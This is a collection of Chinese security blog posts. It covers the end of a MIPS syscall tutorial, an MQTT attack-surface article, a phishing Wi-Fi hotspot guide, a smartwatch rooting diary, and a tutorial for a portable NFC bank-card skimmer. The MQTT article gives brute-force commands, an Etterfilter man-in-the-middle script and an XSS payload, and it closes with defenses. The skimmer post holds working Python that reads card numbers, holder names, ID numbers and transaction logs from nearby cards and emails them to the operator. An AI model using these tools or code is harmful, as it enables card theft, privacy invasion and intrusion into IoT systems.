3. 参数所使用的寄存器：$v0， $a0, $a1

4. 返回值使用：$v0

大概意思是要打印的字符串应该有一个终止符，估计类似C中的'\0', 在这里我们只要声明字符串为 .asciiz 类型即可。下面给个我用Mars4.4的提示：

1. 对于读取整型，浮点型，双精度的数据操作，系统会读取一整行，（也就是说以换行符为标志 '\n'）

2. read_string和fgets类似

举例打印一个存储在寄存器$2里的整型：

Print out integer value contained in register $t2
li  $v0, 1         # load appropriate system call code into register $v0;                   # 声明需要调用的操作代码为 1 （print_int) 并赋值给 $v0                   # code for printing integer is 1move    $a0, $t2   # move integer to be printed into $a0:  $a0 = $t2                   # 将要打印的整型赋值给 $a0syscall            # call operating system to perform operation

举例读取一个数，并且存储到内存中的 int_value 变量中：

Read integer value, store in RAM location with label int_value (presumably declared in data section)li  $v0, 5           # load appropriate system call code into register $v0;                     # code for reading integer is 5syscall              # call operating system to perform operationsw  $v0, int_value   # value read from keyboard returned in register $v0;                     # store this in desired location

举例打印一个字符串(这是完整的，其实上面栗子都可以直接替换main: 部分，都能直接运行

    .datastring1    .asciiz  "Print this.\n"# declaration for string variable, # .asciiz directive makes string null terminated
    .text        main:    li  $v0, 4  # load appropriate system call code into register $v0;# code for printing string is 4                 la  $a0, string1# load address of string to be printed into $a0                  syscall  # call operating system to perform print operation

举例执行到这里，程序结束，立马走人，管他后边洪水滔天~~

li  $v0, 10    　 # system call code for exit = 10syscall           # call operating sys

参考引用：

本文属于转载非原创，略有修改： https://www.cnblogs.com/thoupin/p/4018455.html这篇文章的英文原版地址在这里： https://minnie.tuhs.org/CompArch/Resources/mips_quick_tutorial.html

MQTT安全初探

Fri, 08 Jan 2021 20:09:00 +0800

原创年华不散场 2021-01-08 20:09

今天我们将从三个方面来探讨一下MQTT的安全性，分别是登陆认证问题、权限控制问题以及Broker自身安全性的问题。

文年华 | 图 lmn

随着物联网的快速发展，当前在物联网中的常见的五种协议分别是：HTTP、CoAP、XMPP、AMQP、MQTT。但在这么多协议中，毫无疑问MQTT最具代表性,因为它占用带宽小、轻量级、简单易用等优点最符合物联网的应用场景。可以毫不夸张的说：每个物联网开发人员都一定了解MQTT

今天我们将从三个方面来探讨一下MQTT的安全性，分别是登陆认证问题、权限控制问题以及Broker自身安全性的问题（不知道什么是Broker没关系，接着往下看就是了），如果师傅已经了解了MQTT的基础知识建议直接看第三小节

【本文所有截图均在模拟环境进行】

1 MQTT简介

术语

为了防止师傅们疑惑，本文使用术语定义如下：

客户端（Client）：使用MQTT的程序或设备，一般分为发布者和订阅者

服务端（Server）：发布者和订阅者之间的中介【Broker】

主题（Topic）：附加在消息上的一个标签，Broker会将该消息发送给所有订阅该主题的订阅者

主题过滤器（Topic Filter）：订阅者订阅时可使用通配符同时订阅一个或多个主题

基本介绍

MQTT的主要工作原理如下图所示，发布者和订阅者就像常见系统中的客户端一样，中心服务器在MQTT中被称为Broker^[1]

△ 图片来源：mqtt.org

那MQTT的设计优点有哪些呢？郭朝斌老师将其归纳为五个方面^[2]

1. 契合物联网大部分应用场景的发布-订阅模式

2. 能够满足物联网中资源受限设备需要的轻量级特性

3. 时刻关注物联网设备低功耗需求的优化设计

4. 针对物联网中多变的网络环境提供的多种服务质量等级

5. 支持在物联网应用中越来越被重视的数据安全

接下来我们分别讲解一下这五个特性

发布-订阅模式

△ 图片来源：emqx.io

通过上图可以看到有两个MQTT客户端同时订阅了同一个主题Temperature，当温度传感器作为发布者发布其检测到的温度时，订阅者手机、电脑和后端服务器都会收到同样的消息

发布-订阅模式的优点在于发布者与订阅者的解耦，这种解耦表现在以下两个方面^[3]：

1. 空间解耦，订阅者与发布者不需要建立直接连接，新的订阅者想要加入网络时不需要修改发布者的行为

2. 时间解耦，订阅者和发布者不需要同时在线，即便不存在订阅者也不影响发布者发布消息

因为发布-订阅模型的应用，使得MQTT允许一个传感器发布的数据触发多个订阅者的一系列动作

轻量级模型

MQTT的轻量体现在两个方面：

一是MQTT消息采用二进制的编码格式，充分利用字节位，协议头紧凑，减少了通过网络传输的数据量。下图展示了MQTT的固定头格式：

△ 图片来源：docs.oasis-open.org

二是MQTT消息交互流程非常简单，MQTT 3.1.1一共定义了14种数据包类型，感兴趣的朋友可以查阅MQTT的官方手册，这里不再赘述

https://mcxiaoke.gitbooks.io

低功耗优化

MQTT协议十分注重低功耗的优化设计，主要体现在Keepalive机制

这个机制工作的原理是：Client 和 Broker 都基于 Keepalive 确定时间长度，来判断一段时间内是否有消息在双方之间传输。这个时间长度是Client建立连接时设置的，如果超出这个时间长度，双方没有收到新的数据包，那么就判定连接断开。
虽然 Keepalive 要求一段时间内必须有数据包传输，但实际情况是，Client 和 Broker 不可能时刻都在传输主题消息。因此MQTT定义了 PINGREQ 和 PINGRESP 这两种消息类型。它们都没有可变头部和消息体，也就只有 2 个字节大小。Client 和 Broker 通过分别发送 PINGREQ 和 PINGRESP 消息，就能够满足 Keepalive 机制的要求。

此外，MQTT 5.0 还引入了重复主题特性，即Client在重复发送某个Topic的消息时，可以从第二次开始将Topic长度设置为0

多种QoS

在物联网环境中网络质量不稳定、网络带宽低等因素均会影响到发布者、订阅与Broker之间的通信。为了解决这个问题，MQTT协议设计了三种不同的QoS如下：

1. QoS 0，表示消息至多收到一次，即消息可能丢失，但不会重复投递

2. QoS 1，表示消息至少收到一次，即消息保证送达，但可能重复投递

3. QoS 2，表示消息有且只有收到一次

安全传输

提到安全传输，首先我们要验证客户端是否有权限接入MQTT Broker

MQTT支持两种层次的认证：

1.传输层认证，传输层使用TLS认证设备，并且加密了通讯。

2.应用层认证，支持client id / username / password 等方式认证设备，但是只在应用层验证设备，不加密通讯

在本文中我们主要分析在应用层认证的MQTT，因为在传输层直接使用TLS加密之后我们就没有办法嗅探或者做其他操作了。但也这不是意味着支持TLS就能解决所有问题，因为MCU/RTOS根本玩不了TLS，怎么办？还能怎么办，继续不加密呗

接下来我们再来看看MQTT的认证过程：

客户端将用户名密码使用CONNECT消息发送到Broker，Broker根据认证信息判断是否准入，使用CONNACK消息返回结果，其中认证返回值的具体含义如下：

通过这个表格，其实我们可以判断，如果连接某个Broker，返回值为0就代表我们已经成功连接，如果返回值为4说明我们的账号密码错误，如果返回值为5说明该Broker不支持用户密码方式登陆【需要记住】

最后我们还需要注意Broker支持认证链，它会按照默认先后顺序进行链式认证：

△ 图片来源：docs.emqx.cn

主题

MQTT协议基于主题(Topic)进行消息路由，主题(Topic)类似URL路径，例如：

chat/room/1sensor/10/temperaturesensor/+/temperature$SYS/broker/metrics/packets/received$SYS/broker/metrics/#

主题(Topic)通过'/'分割层级，支持'+', '#'通配符:

'+': 表示通配一个层级，例如a/+，匹配a/x, a/y   '#': 表示通配多个层级，例如a/#，匹配a/x, a/b/c/d

订阅者可以订阅含通配符主题，但发布者不允许向含通配符主题发布消息^[4]

2 MQTT体验

既然要搞MQTT，怎么可以连工具都没有呢？这里我们直接使用hbmqtt这个库来模拟MQTT client，安装方式很简单，直接pip

pip3 install hbmqtt

这里我们使用eclipse提供的免费broker进行测试，地址如下：

mqtt.eclipseprojects.io

△ 图片来源：mqtt.eclipseprojects.io

它提供了四种mqtt连接方式，今天我们主要来看看不加密的TCP连接方式，即常见的1883端口

我们打开一个终端，订阅/nianhua/iotsecurity这个主题消息：

hbmqtt_sub --url mqtt://mqtt.eclipseprojects.io:1883 -t /nianhua/iotsecurity

打开另一个终端，通过hbmqtt_pub发布一个/nianhua/iotsecurity主题的消息

hbmqtt_pub --url mqtt://mqtt.eclipseprojects.io:1883 -t /nianhua/iotsecurity -m Hello,World!

如果想了解命令的执行细节，可以在上面的命令中加上"-d"参数

再次查看打开的第一个命令行，我们可以发现我们发送的Hello,World!已经接收到了。至此，我们已经完成了一次MQTT通信

另外如果你不喜欢命令行，这里推荐一个超级好用的MQTT客户端：MQTTX 下载地址：https://mqttx.app/cn/

△ 图片来源：mqttx

Emmmmm，如果你连软件都不想下，那这里推荐给你一个在线的MQTT客户端：

tools.exqx.io

△ 图片来源：tools.exqx.io

3 MQTT攻击面

在这一小节我们主要介绍MQTT面临的安全风险以及如何去攻击

我们可以使用关键字"port=1883 && banner=MQTT"在fofa中搜索使用了默认端口的Broker，搜索结果如下图(January 5, 2021)所示，共发现了约26万可用Broker

△ 图片来源：fofa

接下来我们就从登陆认证问题、权限控制问题以及Broker自身安全性的问题来分析MQTT的安全性

登陆认证问题

1.匿名登陆

通过使用shodan检索MQTT协议,我们可以发现很多MQTT Connect code为0，这意味着连接到该MQTT Broker无需进行身份验证【详见1-MQTT简介/安全传输】

△ 图片来源：shadon

经笔者粗略统计大概有67.9%的可用MQTT Broker设置了匿名登陆：

2.用户名密码暴力破解

说是暴力破解，其实主要还是看字典【主要是MQTT中常见的弱口令】，因为MQTT只是单纯验证用户名和密码，没有其他校验机制，所以我们可以使用暴力破解来尝试获取用户名和密码

借着暴力破解这一小节，我们介绍一个新工具：MQTT-PWN，上图就是我们用MQTT-PWN破解某个MQTT Broker的成功截图，爆破得到了账号密码，就可以直接接入Broker

该项目的Github地址如下：

https://github.com/akamai-threat-research/mqtt-pwn

最好使用Docker的安装方式，pyenv有点问题，暴力破解的命令：

bruteforce --host host --port port -uf USERNAMES_FILE -pf PASSWORDS_FILE

默认用户和密码字典在mqtt-pwn的resources/wordlists文件夹中

MQTT-PWN还支持更多功能，如Owntracks (GPS Tracker)、Sonoff Exploiter等^[5]

感兴趣的大家自己看下文档去进行测试

3. 嗅探账号密码

因为MQTT是基于TCP协议实现的，在流量传输的过程中并未考虑加密（这里是指的除去MQTTS之外，即不包含使用TLS的MQTTS），其实这样做也有利于降低客户端设备的成本，毕竟本来单片机算力就不高

假设我们现在和客户端设备位于同一个网络中，我们可以通过嗅探局域网流量（MIMT中间人攻击）来抓取账号密码

△ 图片来源：MQTT安全案例分享[6]

抓取到设备的账号密码后，我们就可以通过MQTT工具或者是MQTT-PWN连接到Broker进行下一步攻击

4. 从Web应用中获取账号密码

很多厂商为了展示自己的物联网设备，往往会开发一个展示屏幕，如这种：

△ 图片来源：some where

而这些展示的信息来源有部分可能是通过浏览器直接连接到MQTT Broker，订阅部分要展示的信息

通过查看请求信息或者是从F12中的network查看该页面是否有mqtt的连接操作等等，如果有就可以继续在js文件中搜索是否存在mqtt的地址、账号密码等信息

5. 硬件层面-固件提取

对于无法通过一般途径获取账号密码的客户端，我们可以通过提取设备的固件，对其逆向分析，然后把文件系统中的证书或是账号密码提取出来

然后我们就可以仿冒该设备连接到Broker，订阅/#【主题通配符】。或者是Broker中的ACL配置有问题，尝试是否可以控制其他设备等等

6. 中间人篡改消息

这个中间人和刚刚的账号密码嗅探虽然用的是同一种技术，但是这种方法是直接在流量中修改发送者发出消息

现在攻击者和客户端（发布者/订阅者）在同一个网络中，攻击者作为中间人代理客户端和Broker的通信^[4]

假设攻击者想篡改将发布的主题名从"outTpoic"修改为"outTpuc"，攻击者需要从流量中筛选出符合条件的报文进行修改，我们可以使用Etterfilter配合脚本来完成：

#owned.filterif (ip.proto == TCP && tcp.dst == 1883 && ip.dst == 'IP Broker' &&search(DATA.data, "outTopic")) {  replace("outTopic", "outTopuc");  msg("payload replaced\n");}

权限控制问题

1. 登陆至订阅者

当我们通过上述方法登陆至Broker之后，我们可以订阅该broker的所有主题消息（使用/#，#是MQTT消息主题通配符），如下图所示

此外我们还编写了一个脚本用来提取所有发布者发送的消息，我们可以看到提取出来的信息包括姓名、电话、经纬度、昵称以及其他敏感信息等等【实验数据！！！】

2. 登陆至发布者

我们还可以对该系统中的主题进行分析，这里我们以路灯举例，路灯作为订阅者接收来自合法发布者的控制。如下图所示，如果我们冒充合法发布者对路灯进行恶意控制

此外，我们还可以冒充发布者发布更新固件指令，blah ... 下面我们来看个案例^[6]

智慧大厦场景中存在和停车、安防、灯光、广播、会议、环境监测等相关的各类传感器，这些传感器将受控于网关，并利用网关将数据传输到云端呈现。在本案例中，MQTT的通信安全问题出现在智慧大厦的网关盒子中。

拓扑逻辑如下：
在MQTT的通信场景中，研究员在网关前端抓取TCP数据包，并通过盒子的平台控制盒子的Wi-Fi射频打开与关闭，发现其通信方式使用的是MQTT通信，其认证方式只用了用户名和密码。

基于之前的分析，发现只需要一条shell命令即可控制这个通信过程。事实证明，盒子的Wi-Fi指示灯成功被我们熄灭和点亮。

由于存在厂商相关的敏感信息，本章不再展示实图，有兴趣的朋友欢迎随时沟通交流。

Broker自身安全性问题

1. 默认账户口令

现在有很多开源的Broker实现，在国内较为出名的是EMQ X，它不仅提供高并发能力的集群特性还支持扩展插件机制。该项目还提供给用户一个可直观查看的web仪表盘，通过web界面可以管理设备与监控设备等等。

但该项目为了方便使用者，直接为web管理台设置了默认账号密码，很多厂商部署了EMQ X之后并不会修改默认账号密码，如下图：

通过shadon我们检索出18083端口且title中包含Dashboard的站点，可以使用默认口令尝试登陆【我没试！！！！！！求生欲强烈！！！】

2. XSS漏洞

现在很多Broker都支持WEB端管理，管理员可以直接通过浏览器查看client以及topic等信息。如果我们使用mqtt直接发送包含有xss的信息到Broker就可以直接绕过web端的防御

这里我们使用CVE-2020-13821做实验，首先本地搭建一个hivemq 4.3.2：

docker run -p 8080:8080 -p 1883:1883 hivemq/hivemq4:4.3.2

该Broker的用户名和密码为admin和hivemq，如下图所示：

我们使用hbmqq来发布一个消息，其中消息的内容随便输入，指定client-id为xss payload：

hbmqtt_pub --url mqtt://ip:port -t / -m 1 -i "<img src=x onerror=prompt(2);>"

‍

再回到HiveMQ中的Clients功能页，点击Refresh Snapshot刷新所有MQTT会话：

Bingo，这里只是弹窗演示一下，实际攻击环境中可以更换为XSS平台的payload

3. 其他漏洞

现在MQTT Broker供应商越来越多，但是经过这几天的检索，发现漏洞其实并没有想象的那么多。但是很多攻击面是可以预见的，像是发布者发送消息到订阅者，Broker有可能将其存入数据库，如果没有做好转义，是否能够产生注入等等

这里也仅仅是提供一下思路，希望能够达到抛砖引玉的效果，如果师傅们发现什么好玩的漏洞，欢迎来《物联网IoT安全》公众号投稿

4 其他

MQTT在僵尸网络中的应用

MQTT在僵尸网络中应用这一思路最早是由Lucas和Neal在DEFCON24上提出^[7]，如下图所示

被控IoT设备即是发布者也是订阅者，僵尸设备发布关于设备自身运行状态到bot/status主题，同时订阅用于执行命令的bot/command主题

而C&C攻击者可以通过bot/command主题向设备发送指令，通过订阅bot/status主题获取每个设备的运行状态

5 防范措施

1. 使用MQTTS防止中间人攻击

2. 在MQTT Broker上启用Topic ACL

3. 尽量使用客户端证书作为设备身份凭证，以验证设备合法性

总之，MQTT协议在安全上做出了很多努力，但是使用者并不在意这些安全特性，可能是受限于硬件资源或是对于安全的不重视

如果想要了解更多MQTT的安全防范机制，可以访问

https://www.hivemq.com/mqtt-security-fundamentals/

以获得帮助

6 TODO

最近一直在使用MQTT-PWN，但感觉不是特别好用。希望有时间LMN师傅可以开发一个MQTT的漏洞利用套件【MQTT-SUIT】

7 参考引用

[1] MQTT: The Standard for IoT Messaging. Retrieved January 7, 2021, from https://mqtt.org/[2] 郭朝斌.(2020, November 25). 物联网开发实战. 极客时间. Available January 7, 2021, from https://time.geekbang.org/column/article/312691[3] MQTT 发布订阅模式介绍. Retrieved January 7, 2021, from https://www.emqx.io/cn/blog/mqtt-5-introduction-to-publish-subscribe-model[4] MQTT Topic-based Message Routing. Retrieved January 7, 2021, from https://docs.emqx.io/en/enterprise/v3.0/mqtt.html[5] Tiger-Team.(2020, July 31).物联网安全之MQTT协议安全. 安全课. Retrieved January 7, 2021, from https://www.anquanke.com/post/id/212335[6] https://github.com/akamai-threat-research/mqtt-pwn[7] L, Lundgren.(2016). Light Weight Protocol Serious Equipment Critical Implications. Defcon 24. Retrieved January 7, 2021, from https://www.defcon.org/html/defcon-24/dc-24-speakers.html[8] S. Andy, B. Rahardjo and B. Hanindhito, "Attack scenarios and security analysis of MQTT communication protocol in IoT system," 2017 4th International Conference on Electrical Engineering, Computer Science and Informatics (EECSI), Yogyakarta, 2017, pp. 1-6, doi: 10.1109/EECSI.2017.8239179.[9] D. Evans, “ The Internet of things: how the next evolution of the Internet is changing everything,” Cisco Internet Business Solution Group White Paper, April 2011.

Cobalt Strike｜DNS Beacon

广告时间

手把手带你搭建钓鱼Wi-Fi热点[1]

Tue, 25 Aug 2020 22:57:00 +0800

原创年华不散场 2020-08-25 22:57

手把手教你搭建钓鱼Wi-Fi

Hello，小伙伴们晚上好。今天我们来搭建一个钓鱼Wi-Fi，这里需要一台双网卡的电脑（其中一个网卡必须是无线网卡）。系统采用的是ubuntu18，安装步骤就省略啦

我们首先查看一下网卡信息：

需要禁用WI-FI并解锁操作，最后再配置IP地址

nmcli radio wifi offrfkill unblock wlanifconfig wlan0 172.16.1.1

需要注意wlan0是网卡的名字，像这个ubuntu的网卡名为wlx70f11c127eb9

我们这里选择使用hostapd这个软件来创建热点，该软件需要一个配置文件，内容如下：

interface=wlan0ssid=FreeWIFIdriver=nl80211channel=1hw_mode=g

这里有个坑，等号左右不能有空格

启动hostapd

sudo hostapd ./open.conf

如此一来，我们的Wi-Fi热点就创建成功了。

但是我们还没有配置dns和dhcp服务器

使用apt安装isc-dhcp-server：

修改/etc/default/isc-dhcp-server配置文件，将网卡改为我们的无线网卡：

修改/etc/dhcp/dhcpd.conf配置文件，编辑DHCP地址池以及DNS服务器地址等等

启动DHCP服务

还有最后一步就是要将wlan网卡上接收到的流量转发到有线网卡上，这样我们才可以让钓鱼Wi-Fi内的客户端上网。

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

还有一步就是永久开启路由功能：修改/etc/sysctl.conf文件将net.ipv4.ip_forward=1前的#去掉并保存。

我们来试试能不能上网：

Nice，现在我们已经完成第一步啦，在linxu上共享了一个热点，下一篇文章我们将要介绍抓取图片、HTTP敏感信息等等。

广告时间

关于一次智能手表的探索

Sun, 05 Jul 2020 20:30:00 +0800

Anonymous 2020-07-05 20:30

最近网上智能手表非常的火，于是在闲鱼上淘了一个30块的智能手表，经过一番折腾后。。

最近网上智能手表非常的火，于是在闲鱼上淘了一个30块的智能手表，经过检测这个手表是HELVEI型号的

配置如下：

RAM 0.5G

ROM 1G

电池 300毫安

安卓版本5.1

有心率检测，步数检测，消息通知，表盘选择，自带扬声器震动，但是没有nfc功能，30块（邮费15，555555）还要什么自行车，真的是血赚

由于没有线只能手动去接

最后不行又买了一个数据线，太难了，表的周围是金属的，接了就短路

开机显示效果

还能切换表盘，表单下个软件还能自定义，该有的功能都有

因为是安卓系统，那真的是太友好了，直接adb大法

用AID64看看系统

安装个哔哩哔哩，看看罗老师的视频，不亦乐乎

仅仅是这样还不够，这个自带的系统太鸡肋了，我看了网上的大佬操作

进行刷机一开始的系统是fitwear的，刷了一个Xwatch的0042包

经过漫长的等待开机，成功开机，哈哈哈哈哈哈

但是又一想，这能不能root

于是我用秋之盒工具箱先进入fastboot模式解锁oem

然后线刷第三方REC，再刷面具

经过一系列折腾终于刷进了第三方REC

接下来刷进去面具

成功刷入，哈哈哈哈哈

这个手表有很好的玩机体检，可以安装手表上的生态软件，也可以自定义开发，这不仅是个手表，它是一个娱乐工具

一步步教你制作移动式银行卡信息读取器

Sun, 28 Jun 2020 20:00:00 +0800

Jack Ma 2020-06-28 20:00

银行卡信息读取器？太强了

我先上图吧，看看你是不是感兴趣：

侧面图:

正面图：

拿着它扫了一下我姥姥的裤兜：

过了几秒，手机收到一封邮件！

如果看到这你兴奋了，那么接着往下看看：

背景：半年前，我从网上看到一个视频，讲的大概是一个人站在了一个人的旁边，待了几秒，然后就知道了那个人的银行卡信息了，而且不仅是银行卡信息，甚至连持卡人的姓名，身份证号都有。我看完之后，当时就惊呆了。现在的人都这么牛了吗？于是不假思索的也从网上买了一个一模一样的NFC读卡器，幻想着自己也可以这么厉害。可是货一到，热情就没了，因为当时以为很简单，哪知研究了一下竟不知从哪下手。不过好在也没浪费，拿着它配了个钥匙。就这样一晃半年过去了……最近我又看到了这个NFC读卡器，然后还找到了自己大学时期买的树莓派，心想着，是不是可以结合一下。最终功夫不负有心人，花了好几天的时间，终于把它们拼起来了！

设备：充电宝(5v输出)、树莓派(3代)、NFC读卡器(ACR122U-A9)、手机(具备热点功能)

语言：python3

流程：大概就是用充电宝充当树莓派的电源，然后把NFC读卡器连接到树莓派，并在树莓派里面执行读取银行卡的程序，读取到银行卡信息后树莓派通过手机开的热点网络将银行卡信息发送到自己的邮箱，于是手机上就能看到银行卡相关信息了。

难点：主要是如何通过NFC读卡器，从银行卡里读数据。需要通过读卡器给银行卡发送什么数据，对银行卡返回的数据做怎样的处理。

写代码前准备：虽然看着下面主代码不多，但其实里面要学很多知识，尤其是关于金融集成电路（IC）卡规范里面的内容，当时反反复复看了一个通宵才弄明白了一些。我们在写代码前大致是要先找到NFC读卡器说明文档和银行卡相关规范，了解其工作过程。NFC读卡器发送请求数据给银行卡，然后银行卡响应数据，发送和响应的这些数据都是十六进制表示的，在银行卡规范中均有详细说明。知道了命令之后，就是测试。测试我们用ACR122U读卡器配套的工具（ACR122UTool，可在官网下载，下面资源包中也有）就行，该工具可以发送十六进制命令，然后会显示出响应的十六进制格式的字符串，这个字符串是TLV格式的，直接看看不懂，需要再解析一下，这时便可使用工具EMV TLV查询分析器（下面资源包中已有）。你把得到的字符串直接复制上去，它会给你解析好，这样你看起来就清晰一些了。不过解析出来的依旧是十六进制，这些个十六进制的字符其实是字节串，这时候需要用python给转码一下，转成gb2312（不要问我怎么知道要转成这个格式的，因为我是挨个测试出来的……）就可以看到字母或中文了。最后把这一系列过程用python写出来就行了。

ACR122UTool截图：

将上面的结果复制去空格粘贴到EMV TLV查询分析器中分析：注：最后的'90 00'不要复制，因为这是这个工具的状态信息，9000表示返回成功。

我们看到十六进制字符串已经被解析成一段一段了，每段都有其特殊的意义，我们把其中的value转码成gb2312，就能看到字母或汉字了。

主程序代码：

#coding=utf-8import sysimport timeimport requests
from smartcard.System import readersfrom smartcard.util import toHexString, toBytes, HEX, PACK
from search_map import trade_type2str, create_card_info, read_tag, create_identityCard_infoimport send_mails
def _card_type(typeStr):    #银行卡类型标注      # example: 'PBOC DEBIT' ==> 'PBOC DEBIT(借记卡)'    if typeStr.upper() == 'PBOC DEBIT':        typeStr = typeStr + '(借记卡)'    elif typeStr.upper() == 'PBOC CREDIT':        typeStr = typeStr + '(信用卡)'    return typeStr

def _del20or00(astr):   #删除商户名称后边多余字符    # example: 50424F435F4C4556454C32205445535400000000  ==> 50424F435F4C4556454C322054455354    while astr[-2:] == '00' or astr[-2:] == '20':        astr = astr[:-2]    return astr

def _jie_duan1(rawStr): #返回字符串rawStr中'D'以前的字符，即银行卡号    # example:  1111111111111111D191200000000000F ==> 1111111111111111111    return rawStr[:rawStr.find('D')]def _jie_duan2(rawStr): #返回字符串rawStr中'D'之后的4个字符，即失效日期    # example:  1111111111111111D191200000000000F ==> 1912    return rawStr[rawStr.find('D')+1:rawStr.find('D')+1+4]

def insert_chr(insertStr, intCount=4, intChr=' '):    #将银行卡号、日期等做下简单处理，便于观看    # example: 1111111111111111111 ==> 1111 1111 1111 1111 111    # example: 191210 ==> 19/12/10    L = []    for n in range(0,len(insertStr),intCount):    #每intCount个字符一个intChr        L.append(insertStr[n:n+intCount])    return intChr.join(L)

def log_analyzing(logStr):  #交易日志解析，转为字典，映射表参见<>(下简称为JRT0025)第5部分 表45    # example: 16070308461000000002000000000000000001560156494342432041544D000000000000000000000000010051 ==> {'9A': ['交易日期', '160703'], '9F21': ['交易时间', '084610'], '9F02': ['授权金额', '000000020000'], '9F03': ['其他金额', '000000000000'], '9F1A': ['终端国家代码', '0156'], '5F2A': ['交易货币代码', '0156'], '9F4E': ['商户名称', '494342432041544D'], '9C': ['交易类型', '01'], '9F36': ['应用交易计数器(ATC)', '0051']}    log_tlv = {}    log_tlv['9A'] = ['交易日期', logStr[0:6]]    log_tlv['9F21'] = ['交易时间', logStr[6:12]]    log_tlv['9F02'] = ['授权金额', logStr[12:24]]    log_tlv['9F03'] = ['其他金额', logStr[24:36]]    log_tlv['9F1A'] = ['终端国家代码', logStr[36:40]]    log_tlv['5F2A'] = ['交易货币代码', logStr[40:44]]    log_tlv['9F4E'] = ['商户名称', _del20or00(logStr[44:84])]    log_tlv['9C'] = ['交易类型', logStr[84:86]]    log_tlv['9F36'] = ['应用交易计数器(ATC)', logStr[-4:]]    return log_tlv

def hex2gb2312(hexStr):     #将十六进制转换为gb2312字符    # example: 494342432041544D ==> ICBC ATM    return bytes(toBytes(hexStr)).decode('gb2312')

def tlv_analyzing(*tlv):    #对tlv格式进行解析,详细可参见JRT0025第5部分 附录A 表A.1    tag = read_tag()    newtag = {}     not_tlv2 = ('6F','70','72','73','77','80','A5','90')    # 2个字符的模板    not_tlv4 = ('BF0C')                                     # 4个字符的模板    for each_tlv in tlv:        each_tlv_raw = each_tlv        each_tlv = each_tlv + ' '        # print(each_tlv)        while len(each_tlv) != 1:   #说明还存在数据，如果为1则值为' '            if each_tlv.startswith(not_tlv2):   #检测特殊情况,如果开头是2个字符的模板等                if each_tlv[0:4] == '7081':     # 70为模板，以7081开头的一般长度有4位(81xx)，所以将7081xx删掉                    each_tlv = each_tlv[6:]                elif each_tlv[0:4] == '9081':   # 90为证书，暂不处理，直接连数据一起删掉                    length = int(each_tlv[4:6], 16)                    each_tlv = each_tlv[6+length*2:]                else:                    each_tlv = each_tlv[2+2:]   #将模板和长度删掉            elif each_tlv.startswith(not_tlv4): #同上                each_tlv = each_tlv[4+2:]            else:                               #解析TLV                if each_tlv[0:2] in [i for i in tag if len(i) == 2]:                    length = int(each_tlv[2:4], 16)                    value = each_tlv[4:4+length*2]                    tag[each_tlv[0:2]][1] = value                    each_tlv = each_tlv[4+length*2:]                elif each_tlv[0:4] in [ j for j in tag if len(j) == 4]:                    length = int(each_tlv[4:6], 16)                    value = each_tlv[6:6+length*2]                    tag[each_tlv[0:4]][1] = value                    each_tlv = each_tlv[6+length*2:]                else:                           #如果解析不了                    print('发现未识别的标签：', each_tlv[0:2], 'or', each_tlv[0:4])                    print('原始标签：', each_tlv_raw)                    print('-' * 50)                    break    # print(tag)    return tag   

if __name__ == '__main__':    detection = 0   #检测扫描的银行卡是否和刚刚扫描的一致，如果一致则不再扫描，以免出现重复数据    SELECT1 = [0x00,0xA4,0x04,0x00,0x07,0xA0,0x00,0x00,0x03,0x33,0x01,0x01] #选择卡片    SELECT2 = [0x00,0xB2,0x01,0x14,0x00]    #银行卡号、生失效日期    SELECT3 = [0x00,0xB2,0x01,0x0C,0x00]    #证件号、姓名、证件类型    SELECT4 = [0x80,0xCA,0x9F,0x79,0x00]    #读取电子现金余额    while True:     #程序持续运行        try:        #选择卡片，发送请求数据，获取响应数据            r = readers()   #以下代码及说明参见pyscard官方文档            connection = r[0].createConnection()            connection.connect()            data1, sw1, sw2 = connection.transmit(SELECT1)            if data1 == []:                print('扫描到非银行卡')                time.sleep(0.1)                continue            data2, sw1, sw2 = connection.transmit(SELECT2)            if detection == data2:      #如果前后数据没变化，则重新扫描卡片                continue            data3, sw1, sw2 = connection.transmit(SELECT3)            data4, sw1, sw2 = connection.transmit(SELECT4)            data5_list = []            for i in range(1,0xB):      #先从卡里读数据，后面再处理                SELECT5 = [0x00,0xB2,i,0x5C,0x00]   #前 i 条交易日志                data5, sw1, sw2 = connection.transmit(SELECT5)                if data5 == []:                    break                else:                    data5_list.append(data5)        except:            time.sleep(0.1)        else:            tlv1 = toHexString(data1,PACK)            tlv2 = toHexString(data2,PACK)            tlv3 = toHexString(data3,PACK)            tlv4 = toHexString(data4,PACK)            res = tlv_analyzing(tlv1,tlv2,tlv3,tlv4)            s = ('''银行卡类型：%(cardtype)s 银行卡号：%(cardnumber)s银行卡发卡行：%(cardbank)s银行卡有效期：%(valid)s - %(invalid)s电子现金余额：%(balance).2f持卡人姓名：%(name)s持卡人证件号：%(idcardnumber)s证件归属地：%(idcardbelong)s''' % {'cardtype': _card_type(hex2gb2312(res['50'][1])), 'cardnumber': insert_chr(res['5A'][1].rstrip('F')) or insert_chr(_jie_duan1(res['57'][1])), 'cardbank': create_card_info(res['5A'][1].rstrip('F')) or create_card_info(_jie_duan1(res['57'][1])), 'valid': insert_chr(res['5F25'][1],2,'/'), 'invalid': insert_chr(res['5F24'][1],2,'/') or insert_chr(_jie_duan2(res['57'][1]),2,'/'), 'balance': int(res['9F79'][1])/100, 'name': hex2gb2312(res['5F20'][1]), 'idcardnumber': hex2gb2312(res['9F61'][1]), 'idcardbelong': create_identityCard_info(hex2gb2312(res['9F61'][1])) }   )            # print(s)            s = s + '\n最近十次交易如下：'            for data5 in data5_list:                tlv5 = toHexString(data5,PACK)                log_tlv = log_analyzing(tlv5)                s = s + ('''\n\n交易日期  交易时间  授权金额        商户名称        交易类型%7s %9s %9.2f %15s %12s'''% (insert_chr(log_tlv['9A'][1],2,'/'),insert_chr(log_tlv['9F21'][1],2,':'),int(log_tlv['9F02'][1])/100, hex2gb2312(log_tlv['9F4E'][1]), trade_type2str(log_tlv['9C'][1])))            print(s)            send_mails.send('NFC',s.replace('\n','
'))   #发送邮件            print('*' * 80)            detection = data

‍执行以上代码前需安装pyscard库：

sudo apt-get install pcscd git python3-setuptools swig gcc libpcsclite-dev python3-devsudo echo "install nfc /bin/false" >> /etc/modprobe.d/blacklist.confsudo echo "install pn533 /bin/false" >> /etc/modprobe.d/blacklist.confcd ~git clone https://github.com/LudovicRousseau/pyscard.gitcd pyscardsudo python setup.py build_ext installreboot

(注：windows用户可直接执行 pip3 install pyscard 安装)

程序及资料： NFC资料代码

